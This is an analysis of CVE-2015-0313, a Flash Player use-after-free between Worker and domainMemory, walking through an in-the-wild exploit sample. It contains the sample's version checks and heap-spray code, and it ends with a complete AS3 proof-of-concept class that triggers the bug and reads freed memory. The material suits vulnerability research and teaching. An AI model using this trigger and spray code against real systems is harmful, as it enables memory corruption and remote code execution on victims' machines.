CVE-2015-0313: New Flash Exploit Analysis - exploit warning - the black bar safety net

ID MYHACK58:62201560580
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-03-31T00:00:00


Overview

Recently a number of high-severity Flash Player vulnerabilities have come to light, and Flash exploitation is having a moment. I will join in and share a Flash vulnerability exploit here. Since I do not usually work much on Flash, I am taking CVE-2015-0313 as practice. Let's get started.

Environment

Vulnerability: CVE-2015-0313
System: Windows 7 + IE11 + Flash Player (the version the sample targets; that version and earlier versions trigger the vulnerability)
Summary: exploit, ASLR, ROP, controlling EIP

Cause of the vulnerability in brief

This vulnerability was a 0day caught in the wild by Trend Micro in February, and Trend Micro's blog gives a rough analysis of it. I will give a short analysis of the cause here (it has already been covered on the Trend blog) and then concentrate on how the vulnerability is exploited.

Worker

Before analysing the vulnerability, a word about Worker in ActionScript 3.0. Put simply, a Worker runs a second SWF in parallel with the main SWF, much like multithreading. An important part of this is sharing data between workers, which is done through the ByteArray.shareable property: a ByteArray with shareable set to true is memory shared between workers, so each worker sees the same ByteArray data. See the Adobe documentation for details.

domainMemory

This property designates the ByteArray that an ApplicationDomain uses for its global memory operations (the fast memory-access opcodes); domainMemory is itself of type ByteArray.

Cause of the vulnerability

The bug lies in the interaction between Workers and domainMemory. It is triggered as follows:
1) In the main worker, create a sub-worker and share a ByteArray with it.
2) In the main worker, set the shared ByteArray as domainMemory.
3) In the sub-worker, call ByteArray.clear() on the shared ByteArray to release its memory.
4) domainMemory still references the shared memory region: when the sub-worker calls clear() to free the memory, domainMemory is not notified to drop its reference, so it keeps a dangling pointer to freed memory. This is the bug.
By this point anyone following along should be able to construct their own PoC.

Technical details

The above covered why the vulnerability triggers; next we look at how the sample exploits it. The sample uses many tricks to evade anti-virus and to make analysis harder. I will not cover those here, since what we really care about is how it exploits the bug.

Determining the attack environment

The sample first reads the Flash Player version:

    var loc7:String = Capabilities.version.toLowerCase();

If it is not running on Windows, it exits:

    var loc6:String = loc7.substr(0,4);
    if(loc6 != "win ") { return 0; }

Then it checks the Flash Player version number:

    var loc3:Boolean = this.var_13 >= 130000259 && this.var_13 < 140000000 || this.var_13 == 150000246 || this.var_13 >= 160000235;

Here 160000235 represents version 16.0.0.235 (likewise 130000259 is 13.0.0.259 and 150000246 is 15.0.0.246). If loc3 is false, the sample exits.

Download URL

The sample takes the download URL from a parameter passed in by JavaScript:

    loc14 = root.loaderInfo.parameters.exec;

and then runs it through a series of transformations to obtain the real URL, which I will not go through here. After that it writes the encoded shellcode string into a ByteArray.

Memory layout

Next the exploit performs its most important step: a heap spray with a Vector to control the memory layout. The code is roughly:

    this.var_48 = new Vector.<Object>(0x1020);
    loc2 = 0;
    while(loc2 < this.aNmlxJ) {
        loc16 = new ByteArray();
        loc16.endian = "littleEndian";
        this.var_48[loc2] = loc16;
        loc2++;
    }

Then it fills each Vector element; the exploit fills them with ByteArrays:

    g_bt = new ByteArray();
    g_bt.shareable = true;
    g_bt.endian = "littleEndian";
    loc2 = 0;
    while(loc2 < this.vecLength) {
        if(loc2 != 817) {
            loc16 = this.var_48[loc2] as ByteArray;
            loc16.length = 0x2000;
            wIntInByteArr(loc16, 0xcccccccc);   // fill the ByteArray with 0xcccccccc
            loc16.writeInt(0xbabefac0);         // write the tag
            loc16.writeInt(0xbabefac1);
            loc16.writeInt(loc2);
            loc16.writeInt(0xbabefac3);
        } else {
            g_bt.length = 0x2000;
            wIntInByteArr(g_bt, 0x33333333);    // fill with 0x33333333
        }
        loc2++;
    }

As the code shows, this.var_48[817] is not given a filled instance of its own; at that index the shared ByteArray g_bt is used instead, also sized to 0x2000 bytes. Now we can look at the memory layout, but first at how a ByteArray is laid out in memory. In this sample the g_bt object instance address is 0xab22581, but that is not a real memory address: the AVM operates on atoms as its basic type, and the low 3 bits of an atom encode what kind of pointer it holds:

    Untagged = 000 (0)
    Object   = 001 (1)
    String   = 010 (2)

So 0xab22581 & 7 == 1 marks an Object atom, and the underlying object pointer is 0xab22580.
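To make the four trigger steps and the sample's version gate concrete, here is a minimal AS3 document class written for this edit; it is not code from the sample or from Trend Micro's analysis. It assumes the usual single-SWF worker pattern (the SWF reloads itself as the sub-worker from loaderInfo.bytes), that the SWF is built with the ASC 2.0 compiler so avm2.intrinsics.memory.li32 is available, and that Capabilities.version maps onto the sample's integer form as major*10^7 + minor*10^6 + revision*10^5 + build, an assumption chosen because it reproduces the three constants quoted above. The class name, the shared-property keys and the 0xbabefac0 marker are my own choices.

```actionscript
package {
    import avm2.intrinsics.memory.li32;
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.system.ApplicationDomain;
    import flash.system.Capabilities;
    import flash.system.MessageChannel;
    import flash.system.Worker;
    import flash.system.WorkerDomain;
    import flash.utils.ByteArray;
    import flash.utils.Endian;

    // Document class. The same SWF is loaded twice, once as the main (primordial)
    // worker and once as the sub-worker, and branches on Worker.current.isPrimordial.
    public class DomainMemoryTrigger extends Sprite {
        private var shared:ByteArray;
        private var child:Worker;
        private var fromChild:MessageChannel;

        public function DomainMemoryTrigger() {
            if (Worker.current.isPrimordial) {
                runMain();
            } else {
                runChild();
            }
        }

        // Turn Capabilities.version ("WIN 16,0,0,235", lower-cased by the caller) into
        // the integer form the sample compares against (160000235). The weighting is
        // an assumption that reproduces the constants quoted from the sample.
        public static function versionToInt(capVersion:String):int {
            var fields:Array = capVersion.split(" ")[1].split(",");
            return int(fields[0]) * 10000000 + int(fields[1]) * 1000000
                 + int(fields[2]) * 100000 + int(fields[3]);
        }

        // The sample's version gate, written out as a predicate.
        public static function isTargetedVersion(v:int):Boolean {
            return (v >= 130000259 && v < 140000000)
                || v == 150000246
                || v >= 160000235;
        }

        private function runMain():void {
            var ver:String = Capabilities.version.toLowerCase();
            if (ver.substr(0, 4) != "win " || !isTargetedVersion(versionToInt(ver))) {
                return;  // not the environment the sample targets: do nothing
            }

            // Step 1: a shareable ByteArray that both workers will see.
            shared = new ByteArray();
            shared.shareable = true;
            shared.endian = Endian.LITTLE_ENDIAN;
            shared.length = 0x2000;
            shared.writeInt(0xbabefac0);  // marker so the read below is recognisable

            // Step 2: make the shared buffer the domain memory used by li32/si32.
            ApplicationDomain.currentDomain.domainMemory = shared;

            // Spawn the sub-worker from this SWF's own bytes and hand it the buffer
            // plus a channel on which it reports back.
            child = WorkerDomain.current.createWorker(this.loaderInfo.bytes);
            fromChild = child.createMessageChannel(Worker.current);
            child.setSharedProperty("shared", shared);
            child.setSharedProperty("toMain", fromChild);
            fromChild.addEventListener(Event.CHANNEL_MESSAGE, onChildCleared);
            child.start();
        }

        private function runChild():void {
            // Step 3: the sub-worker releases the shared buffer. domainMemory in the
            // main worker is not told about this and keeps its reference.
            var ba:ByteArray = Worker.current.getSharedProperty("shared") as ByteArray;
            var toMain:MessageChannel = Worker.current.getSharedProperty("toMain") as MessageChannel;
            ba.clear();
            toMain.send("cleared");
        }

        private function onChildCleared(e:Event):void {
            fromChild.receive();
            // Step 4: read through the now-dangling domainMemory reference. On a
            // vulnerable build this returns whatever the freed page holds (the marker
            // if it has not been reused yet); on a fixed build the read does not reach
            // freed memory and may throw, which the catch absorbs.
            try {
                var value:int = li32(0);
                trace("li32(0) after clear: 0x" + value.toString(16));
            } catch (err:Error) {
                trace("domainMemory read rejected: " + err.message);
            }
        }
    }
}
```

This is lab-only code for an unpatched build; the trace after clear() is the point at which an exploit would instead start reading and writing through the stale domainMemory reference, and the sample's heap spray described above is what determines what the freed region contains by then.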
